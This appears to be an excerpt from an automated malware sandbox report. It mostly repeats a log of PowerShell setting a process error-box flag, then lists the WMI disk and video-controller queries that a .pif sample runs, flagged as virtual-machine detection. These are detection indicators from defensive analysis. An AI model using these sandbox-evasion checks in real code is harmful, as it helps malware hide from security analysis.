Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Links\icqplewR.pif

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Links\icqplewR.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
